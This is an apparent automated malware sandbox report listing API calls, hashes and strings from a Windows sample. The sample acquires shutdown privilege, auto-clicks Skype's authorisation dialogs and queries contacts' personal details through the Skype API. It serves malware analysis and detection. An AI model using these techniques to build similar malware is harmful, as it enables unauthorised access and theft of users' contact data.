                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$AdaptersInfo$AllocateFreeSleepinet_addr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4155502220-0
                                                                                                                                                                                                                                                      • Opcode ID: 1de6d21674ae7a9416565cf6b339316a61ed98822fc851f012df3c5cd82ddbf6
                                                                                                                                                                                                                                                      • Instruction ID: 25d933aa01d65a0ee66b40fe54a4d57a8d5fecb295dff1c60acf8f39e0479c78
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de6d21674ae7a9416565cf6b339316a61ed98822fc851f012df3c5cd82ddbf6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201DFB2801108AFCB11AFA5D9818EE77ACDA51368721007FF411E7200EF78EEC5DB68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000006,00050005), ref: 00413DED
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken$ExitWindows
                                                                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                      • API String ID: 2133229600-3733053543
                                                                                                                                                                                                                                                      • Opcode ID: 9e2c5fa738271bbbfc0a842d02a264c6e44e78896af363eb2e0fd65456633e6b
                                                                                                                                                                                                                                                      • Instruction ID: e799f9225938af673a64b3dc1b55c5478f18b35a7da82f7c160b49fa6cf42411
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e2c5fa738271bbbfc0a842d02a264c6e44e78896af363eb2e0fd65456633e6b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3C09B313C534096F51417727D4FF4E51555B40F63F51401E76015C0D1FDC554D0441A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 00427247
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                                                                                                      • Opcode ID: abcd8f884eb0d790cf972bef3ed77a72991ea88b0fd8d91913a901745e87547a
                                                                                                                                                                                                                                                      • Instruction ID: 225cd7df6b92b4206f9a7582b4124069e957c177720ba20da0cf16bfbb7ebb29
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abcd8f884eb0d790cf972bef3ed77a72991ea88b0fd8d91913a901745e87547a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E09234B08208EBDB10DBE4E845E9D7BB86B04328F5041A6F510D62D1DBB496148769
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 52332c79a0bd40d1298f6ca88273abcc4f216cf950132b9765b2f45900f3ad78
                                                                                                                                                                                                                                                      • Instruction ID: c9831931d385c97abc0589d6a228ecc03006a0524d3a27148b4b42d13d7189bd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52332c79a0bd40d1298f6ca88273abcc4f216cf950132b9765b2f45900f3ad78
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB42BC76A116058FD748CF69C8D9BA6B3E3BFCC310F5B81FA851A5F265CA706811CE84
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 928e56e57a48a481a7910e8e9d35efa608cd7d846a12f7b1813392c24604a220
                                                                                                                                                                                                                                                      • Instruction ID: 66900e7929e749053c19963c9040592c735d9bb8b2ff140ea9de12773cba0c17
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 928e56e57a48a481a7910e8e9d35efa608cd7d846a12f7b1813392c24604a220
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9B18A71A0421ADFCB15CF14D5D0AA9FBA1BF58328F54C1AEC81A5B342C735EE42CB94
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: f5bc7e8b0cfd9c55f5ee273a7dcf1ee305efd65beac54158c46530f7c1e2e0eb
                                                                                                                                                                                                                                                      • Instruction ID: 2afff48053059701403f0287210e808b21a48eb4058a18c5fc092893e25be9ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5bc7e8b0cfd9c55f5ee273a7dcf1ee305efd65beac54158c46530f7c1e2e0eb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C31E132A0121AABCB15DF78C4D05EEBBF1EB89344F1481AED891A7341D734AE85CB90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 0f74e058b69127539370dbd1afe9503671c14a940c93cf10dca0284eed57b908
                                                                                                                                                                                                                                                      • Instruction ID: da98938ff67e46ff6316c43a934677ccc5072715354b31ec43a9b3bc3835347e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f74e058b69127539370dbd1afe9503671c14a940c93cf10dca0284eed57b908
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A821F832A00224AFCB14EF69DCC48A7B7A5FF44350B8685AAEC158B245D774F915C7E4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: e97b539cb823fac0f91bee5f44b5077dd938fb3448b6e56497f4f5df416f2e3b
                                                                                                                                                                                                                                                      • Instruction ID: 1b50a1263328ffa51d38a1827ee6d12af7b26cc890651d4c3244326047c96eec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e97b539cb823fac0f91bee5f44b5077dd938fb3448b6e56497f4f5df416f2e3b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71F04F77F2153416F78C947ACC513AB918797C8661F5EC63EAEA9E72C5CCB48C1252C0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 0041C86F
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 0041C89C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetDesktopWindow.USER32 ref: 0041436A
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(00000000), ref: 00414377
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: GetWindowRect.USER32(?,?), ref: 00414381
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowTextA.USER32(?,0042A440), ref: 0041438F
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414401
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetWindowPos.USER32(?,000000FF,?,00000000,00000000,00000000,00000040), ref: 0041441C
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414425
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 00414432
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 0041443B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 0041443E
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 00414441
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetForegroundWindow.USER32(?), ref: 00414444
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: SetFocus.USER32(?), ref: 00414447
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: Sleep.KERNEL32(00000064), ref: 0041444B
                                                                                                                                                                                                                                                        • Part of subcall function 0041435D: ShowWindow.USER32(?,00000001), ref: 00414454
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0041C901
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041C908
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041C90F
                                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,0042A440), ref: 0041C917
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000040), ref: 0041C93C
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 0041C973
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0041C97B
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041C999
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041C9AC
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C9B9
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041C9BC
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C9C3
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0041C9C6
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041C9CD
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0041C9D1
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,00000009,00000000), ref: 0041C9EE
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,00000026,00000000), ref: 0041C9F6
                                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000100,0000000D,00000000), ref: 0041C9FE
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041CA73
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0041CA80
                                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0041CAC7
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041CB3C
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000005), ref: 0041CB46
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 0041CB4F
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 0041CB5B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Focus$ForegroundRect$MessagePostShow$MetricsSleepSystem$DesktopTextlstrlen$ClassCountNameTickVisible
                                                                                                                                                                                                                                                      • String ID: tSkACLForm.$tSkMainForm.$tSkNotify
                                                                                                                                                                                                                                                      • API String ID: 3615854559-155394806
                                                                                                                                                                                                                                                      • Opcode ID: 463757892536bf29f106dfa065d9da7bac098429f2f28372f83c722d2c8cfdf3
                                                                                                                                                                                                                                                      • Instruction ID: 33e34fc2864a5c1f50d125138dd43901c9e19477e55f8c9ec2e9d27e71862bec
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 463757892536bf29f106dfa065d9da7bac098429f2f28372f83c722d2c8cfdf3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08B1E671940208BFEB11EFA4DC85FEF3B78EF05714F100056F904A6291DB799A91DBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: wsprintf$Sleep$CriticalSection$EnterLeaveMessageSendlstrlen
                                                                                                                                                                                                                                                      • String ID: GET USER %s ABOUT$GET USER %s BIRTHDAY$GET USER %s BUDDYSTATUS$GET USER %s CITY$GET USER %s COUNTRY$GET USER %s FULLNAME$GET USER %s HOMEPAGE$GET USER %s ISAUTHORIZED$GET USER %s ISBLOCKED$GET USER %s IS_VIDEO_CAPABLE$GET USER %s IS_VOICEMAIL_CAPABLE$GET USER %s LANGUAGE$GET USER %s MOOD_TEXT$GET USER %s ONLINESTATUS$GET USER %s PHONE_HOME$GET USER %s PHONE_MOBILE$GET USER %s PHONE_OFFICE$GET USER %s SEX
                                                                                                                                                                                                                                                      • API String ID: 2111711390-3513588607
                                                                                                                                                                                                                                                      • Opcode ID: 2f15dbdde7687e948eed955ca64e7f3ba777cbf9fa709e115f379ba0845dc2bf
                                                                                                                                                                                                                                                      • Instruction ID: 5bcbf71a064628ea65807ddb805358d2f360003b4b64f9d624bbe829e34e61e6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f15dbdde7687e948eed955ca64e7f3ba777cbf9fa709e115f379ba0845dc2bf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9451C9F2D4022C66DF01B6E9DCC5FDE7F6CEB94708F54081BF505E2082EA6DA3158A65
                                                                                                                                                                                                                                                      APIs
